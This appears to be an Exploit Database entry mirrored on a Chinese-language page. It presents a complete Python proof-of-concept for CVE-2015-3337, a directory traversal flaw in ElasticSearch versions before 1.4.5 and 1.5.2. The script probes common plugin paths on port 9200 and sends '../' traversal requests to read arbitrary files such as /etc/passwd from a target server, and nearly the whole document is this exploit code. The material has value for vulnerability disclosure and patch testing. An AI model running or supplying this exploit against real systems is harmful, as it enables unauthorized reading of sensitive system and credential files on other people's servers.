ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal

• Exploit Database
• 16 阅读

• 作者： pandujar
  日期： 2015-05-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37054/

• #!/usr/bin/python
  # Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
  # Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
  # Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
  # Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/
  #
  # Source: https://github.com/pandujar/elasticpwn/
  
  import socket, sys
  
  print "!dSR ElasticPwn - for CVE-2015-3337\n"
  if len(sys.argv) <> 3:
  print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
  sys.exit()
  
  port = 9200 # Default ES http port
  host = sys.argv[1]
  fpath = sys.argv[2]
  
  def grab(plugin):
  		socket.setdefaulttimeout(3)
  		s = socket.socket()
  		s.connect((host,port))
  		s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
  			"Host: %s\n\n" % (plugin, fpath, host))
  		file = s.recv(2048)
  		print "	[*] Trying to retrieve %s:" % fpath
  		if ("HTTP/1.0 200 OK" in file):
  			print "\n%s" % file
  		else:
  		print "[-] File Not Found, No Access Rights or System Not Vulnerable"
  
  def pfind(plugin):
  	try:
  		socket.setdefaulttimeout(3)
  		s = socket.socket()
  		s.connect((host,port))
  		s.send("GET /_plugin/%s/ HTTP/1.0\n"
  			"Host: %s\n\n" % (plugin, host))
  		file = s.recv(16)
  		print "[*] Trying to find plugin %s:" % plugin
  		if ("HTTP/1.0 200 OK" in file):
  			print "[+] Plugin found!"
  			grab(plugin)
  			sys.exit()
  		else:
  		print "[-]Not Found "
  	except Exception, e:
  		print "[-] Error connecting to %s: %s" % (host, e)
  		sys.exit()
  
  # Include more plugin names to check if they are installed
  pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']
  
  for plugin in pluginList:
  	pfind(plugin)